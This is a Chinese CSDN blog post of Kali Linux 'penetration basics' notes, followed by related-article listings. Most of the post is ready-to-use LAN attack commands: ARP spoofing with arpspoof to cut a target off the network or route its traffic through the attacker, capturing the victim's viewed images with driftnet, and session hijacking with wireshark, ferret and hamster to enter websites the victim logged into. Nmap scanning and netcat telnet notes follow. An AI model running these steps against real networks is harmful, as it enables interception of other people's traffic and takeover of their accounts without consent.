Kali渗透基础

最新推荐文章于 2024-05-22 09:58:13 发布
最新推荐文章于 2024-05-22 09:58:13 发布
阅读量1.5k 收藏 21
点赞数 7
文章标签: Kali 渗透 arp 局域网
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lcdqqq/article/details/53162258
版权

######局域网断网攻击

fping -asg 192.168.1.0/24  ##扫描0网段所有能ping通的ip

nmap  -Ss  192.168.1.141 ##扫描141主机打开的端口


arp攻击

arpspoof -i 自己的网卡 -t  目标IP  目标网关

例如:arpspoof  -i   eth0   -t  192.168.1.100 192.168.1.1


######局域网arp欺骗

目标的IP流量经过我的网卡,从网关出去

首先,进行IP流量转发

echo 1 >/proc/sys/net/ipv4/ip_forward (echo写命令,是不会有回显的)

再进行arpspoof命令

arpspoof  -i   eth0   -t  192.168.1.100 192.168.1.1

此时目标的流量将会经过我的网卡,就成为了arp欺骗

driftnet ##获取本机网卡的图片

因为目标的流量此时经过我的网卡,所以我获取本机网卡图片=获得目标所浏览图片


#######会话劫持——登陆别人登录过的网站

所用软件:

wireshark ##抓包

ferret ##重新生成抓包后的文件

hamster ##重放流量


首先对目标进行arp欺骗,然后用wireshark进行抓包

当目标登陆了某些网站时,wireshark上会显示很多DNS的信息

此时停止抓包,将文件保存为pcap格式,关闭wireshark,

进入保存文件的目录,使用ferret   -r   文件名  命令,生成一个.txt的文件,此时执行hamster命令,会生成一些信息(127.0.0.1:1234)

意思是把代理改为127.0.0.1的1234端口

然后在浏览器输入127.0.0.1:1234即可看到一个ip,点击后进入,有很多地址,在其中找到我们需要的即可


第二种方法:

不用欺骗了

ferret -i eth0

另开一个标签

hamster

改代理端口,同上



Nmap基础学习

nmap 192.168.1.102     扫描此ip地址开放的所有端口

也支持多个ip同时扫描

nmap 192.168.1.102 192.168.8.223

或在同一个子网下:nmap 192.168.1.102,24,171 同时扫描3个ip地址

也可以将需要扫描的ip地址存在一个文件里,通过nmap -iL filename 扫描文件里所有的ip

随机扫描:nmap -iR 3     随机扫描3个ip(我也没搞清楚是什么里的3个)

排除某些ip扫描:如:nmap  10.73.26.0/24 --exclude 10.73.26.183-190 (扫描所有ip除了183到190)

                                        nmap 10.73.26.0/24 --excludefile file.txt  (扫描所有ip除了file.txt里的ip)

扫描开放网络端口:

                                        nmap -o 识别远程操作系统

                                                   -sC 运行默认的脚本扫描

                                                    -A 10.73.31.64

                                                   

可以在扫描出端口后,若有23端口telnet开放,可以使用netcat进行远程连接:

命令:nc ipaddress 23





lcdqqq
关注
  • 7
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用Kali 完成一次简单的渗透
qq_50905066的博客
03-20 3万+
这里我们需要两台虚拟机。一台Kali 作为攻击机,一台Ubuntu作为靶机。 如图: 渗透的话我们需要先得到靶机的ip 地址才能进行扫描。因为是虚拟机,只要我们知道了Kali 的ip 的地址,扫描其所在网段就可以获得靶机的地址了。 如图: 通过使用Kali自带的扫描工具执行Namp -sP 192.168.161.1/24就可以扫到了。这里我们排出太小的地址和太大的地址以及攻击的地址就可以确定靶机的地址了。 在得到靶机的地址之后,我们就可以进一步扫描靶机端口,从其中获得靶机开启的端口和..
Linux——kali系统简介及命令
qq_53937309的博客
10-17 5297
kali是Linux的一种,内部包含众多的网络安全相关的软件。用户分为两类:1.管理员用户也是root,管理员用户具有全部权限,可以进行任意的操作。2.普通用户,新建的用户都是普通用户,权限非常低。
如何使用kali来入侵(渗透)一台windows
最新发布
zz12345600354的博客
05-22 779
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
渗透测试】kali使用教程(一):常用命令和基本工具使用
u011871680的博客
12-03 4万+
kali教程
网络安全与Kali:Sqlmap数据库注入实战
Kali与编程
09-19 1283
背景介绍 sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。 准备工作 1.安装好Kali Linux的虚拟机一台; 1.整装待发的小白一个。 3.详细步骤 3.1 在浏览器中输入自己的ip地址打开dvwa的主页面 3.2 选择默认安全等级 3.3 进入sql注入模块 3.4 随便提交一个数据发现网站提交数据的方式是GET,然.
端口渗透—23端口Telnet
negnegil的博客
09-15 4772
Telnet是一种默认不加密的不安全协议,可以通过它连接到本地网络中的其他系统。 Telnet远程登录 telnet 192.168.0.124 获取Telnet服务版本 nmap -sV -p23 <ip> MITM:远程登录欺骗 通过metasploit的 auxiliary/server/capture/telnet模块在本机上设置一个虚假的telnet服务,通过钓鱼使其登录此telnet服务,一旦其尝试登录此虚假的telnet服务,我们就可以获取到他的登录凭证。这种和钓鱼有异曲同
kali Linux渗透基础知识.pdf
01-25
本文将详细介绍Kali Linux渗透基础知识中的关键环节——信息收集。 信息收集是渗透测试的第一步,它涉及对目标系统进行情报分析、扫描探测、服务查点和漏洞搜索,甚至利用社会工程学技巧获取信息。这一过程旨在了解...
kali的实战渗透
12-14
写的是kali的实战渗透,其中有讲msf渗透kali基础命令使用等等等,非常多
Kali Linux渗透测试技术详解
02-19
第1篇为Iinux安全渗透测试基础,介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限...
Kali Linux系统使用基础教程.pdf
11-29
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:...
Web渗透测试 使用Kali Linux
06-15
使用kali linux做web渗透的经典书籍,外文书籍中文翻译。
Kali-WEB渗透-skipfish使用方法
lvwuwei的博客
05-03 1072
Kali——WEB渗透 学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。 —— 扫描:Skipfish—— skipfish:是一款由谷歌开发的实验性的主动WEB安全评估工具,使用C语言编写,体量小但是功能齐全。特点是:递归爬站,基于字典的探测,速度较快(多路单线程,启发式自动内容探测),误报相对较低。 2.使用 (1).格式:skipfish [opti...
渗透测试-Kali Linux学习(Linux基础、Shell编程、渗透测试软件)
关注网络安全、云原生安全
01-18 1万+
目录结构 Linux的目录结构,类似于一棵树,根节点是“/”。 总览 打开“文件系统根目录” 或者 root@frank:/# cd / root@frank:/# ls 可查看根目录下的文件, 蓝色表示目录; 绿色表示可执行文件,包括.sh,.py等; 红色表示压缩文件,包括.zip、.tar等; 浅蓝色表示链接文件; 灰色表示其它文件,包括.conf,.db,.img,.old等; 黄色是设备文件,包括block, char, disk等。 bin 存放命令/可执行文
kali linux中使用ferret进行cookies劫持攻击
weixin_43996007的博客
01-17 3532
kali linux中使用ferret进行cookies劫持攻击 首先将kali linux的网卡模式设置为“仅主机模式”,使其共享物理主机的网络,并且可以上外网。 在kali中,开启数据转发功能,并查看当前的ip地址。 使用nmap或者zenmap扫描局域网内的主机,确定攻击目标 使用arpspoof命令冒充网关 arpspoof -i eth0 -t 网关 目标主机 ...
kali-简单渗透笔记
weixin_30750335的博客
01-12 2582
端口扫描 nmap -sS 目标ipArp 内网断网Arpspoof -i 网卡 -t 目标ip 网关获取网卡/网关ifconfig获取内网ipfping -asg 192.168.1.0/24Arp 欺骗echo 写命令,是不会有回显的ehco 1 >proc/sys/net/ipv4/ip_forward# 进行IP流量转发目标 --》 我的网卡 --》网关driftnet --&gt...
Kali之Web渗透-扫描工具-Burpsuite
追风筝的孩子
08-04 1万+
        在学习Burpsuit之前,我先说一下什么是代理,就是代理网络用户去取得网络信息,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。形象地说:它是网络信息的中转站。一般情况下,我们使用浏览器直接去连接其他internet 站点取得网络信息时,必须送出请求信号来得到回答,然后对方再把信息以字节方式传送回来。代理服务器是介于浏览器和web 服务...
Kali Linux Web 渗透测试秘籍 第一章 配置 Kali Linux
热门推荐
龙哥盟
10-14 5万+
第一章 配置 Kali Linux 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介在第一章中,我们会涉及如何准备我们的 Kali 以便能够遵循这本书中的秘籍,并使用虚拟机建立带有存在漏洞的 Web 应用的实验室。1.1 升级和更新 Kali在我们开始 Web 应用安全测试之前,我们需要确保我们拥有所有必要的最新
Kali Linux零基础入门到精通
m0_61568580的博客
07-25 1万+
它他预装了数百种享誉盛名的渗透工具,使你可以更轻松地测试、破解以及进行与数字取证相关的任何其他工作。这套KaliLinux资料合集,包括,以及一份。内容全面丰富,特别适合渗透测试初学者学习参考。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值